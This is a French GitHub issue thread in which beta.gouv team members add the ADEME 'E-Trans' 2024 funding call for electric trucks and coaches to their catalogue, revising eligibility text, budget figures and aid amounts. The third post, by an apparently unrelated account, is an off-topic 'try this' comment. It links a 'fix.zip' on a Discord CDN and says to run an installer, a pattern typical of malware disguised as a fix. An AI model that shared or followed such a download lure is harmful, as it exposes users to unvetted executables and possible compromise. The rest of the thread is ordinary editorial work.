### ISSUE TITLE
Ajout de l'AAP E-Trans Véhicules lourds électriques 2024

### ISSUE THREAD

**Issue by celinebagault** [betagouv/mission-transition-ecologique#1046]
Suite demande JB Mattermost : https://mattermost.incubateur.net/betagouv/pl/rrdkrxuujfg5pjaq8q8tkmt5ac

Lien Baserow https://baserow.io/database/114839/table/314437/539069/row/266

**Comment by SNWCreations** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer

**Comment by celinebagault** [comment]
@ColineLebaratoux est-ce que tu peux relire ce dispositif stp ? Merci

**Comment by ColineLebaratoux** [comment]
@celinebagault, j'ai fait les modifs directement pour le mettre rapidement en ligne au vue du délai de cloture approchant. 

- J'ai enlevé la mention "dispositif activable en autonomie". Tu es bien d'accord que ce n'en est pas un ?
- J'ai remplacé le lien de l'étape 1 pour [le PDF du cahier des charges, plus complet que la page Agir](https://agirpourlatransition.ademe.fr/entreprises/sites/default/files/E-trans%20-%20Cahier%20des%20charges%20-%20V2%20-%202024.pdf)
- Dans la description longue, tu as détaillé les budgets globaux alloués à chaque type de véhicule. ça me semble pas être l'info la plus importante pour l'entreprise. D'autant plus, que les autobus ne leurs sont pas destinés (uniquement pour les AOM qui sont des communautés d’agglomération)
>  Le budget consacré aux projets d’acquisition, de rétrofit, ou de location est réparti en trois lots distincts :
>    - 57,1 M€ pour les poids lourds de type porteur 100 % électriques à batterie (catégories N2 et N3),
>   - 38,1 M€ pour les poids lourds de type tracteur 100 % électriques à batterie (catégories N3),
>    - 10 M€ pour les autobus 100 % électriques à batterie (catégories M2 et M3) et navettes urbaines 100  % électriques,
>    - 5 M€ pour les autocars 100 % électriques à batterie (catégories M2 et M3). 
Je propose de remplacer par : 
> Les véhicules éligibles pour les entreprises dont l’activité du transport de marchandises ou de voyageurs sont : 
> - Les poids lourds de type porteur 100 % électriques à batterie (catégories N2 et N3),
> - Les poids lourds de type tracteur 100 % électriques à batterie (catégories N3),
> - Les autocars 100 % électriques à batterie (catégories M2 et M3)

J'ai complété : 
   - le secteur d'activité : Transport de marchandises ou de voyageurs.
   - la section correspondante : H transports et entreposage
   - le montant de l'aide : Jusqu'à 90 000 € HT par véhicule
   - l'éligibilité taille : toutes tailles
